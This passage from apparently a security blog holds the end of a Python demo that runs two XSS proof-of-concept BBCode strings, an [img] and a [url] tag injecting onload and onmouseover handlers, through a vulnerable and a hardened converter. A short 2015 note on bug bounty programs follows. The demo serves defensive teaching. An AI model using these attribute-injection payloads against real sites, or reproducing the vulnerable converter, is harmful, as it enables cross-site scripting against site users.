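    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(escape(text[pos:m.start()], quote=True))
        out.append(_render(m))
        pos = m.end()
    out.append(escape(text[pos:], quote=True))
    return "".join(out)


# Constructed comments with the advisory's two payload shapes (hypothetical image host).
POC_IMG = '[img]http://img.example.com/a.jpg" onload="prompt(1)[/img]'
POC_URL = '[url="https://www.davidsopas.com" onmouseover="prompt(1)"]Your text to link[/url]'

if __name__ == "__main__":
    for poc in (POC_IMG, POC_URL):
        print("vulnerable:", bbcode_to_html_vulnerable(poc))
        print("hardened:  ", bbcode_to_html_safe(poc))
```

Running it prints the exact attribute injection from the advisory for the vulnerable converter and harmless escaped text for the hardened one. Escaping alone would already stop the attribute break-out; the URL validation is there so that a javascript: URL cannot reach src or href either.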

29/09/15 Interesting Readings

Bug Hunter Appreciation Programs

An interesting read about security bug bounties, written by Eduardo Vela: http://sirdarckcat.blogspot.pt/2015/09/not-about-money.html

You’ve got to love this part:

It is my view, that we shouldn’t call them “Bug Bounty Programs”, I would like them to be called “Bug Hunter Appreciation Programs”. I don’t like the term “Bug Bounty”, because bounty sounds a lot like it’s money up for grabs, when the attitude is that of a gift, or a “thank you, you are awesome”.
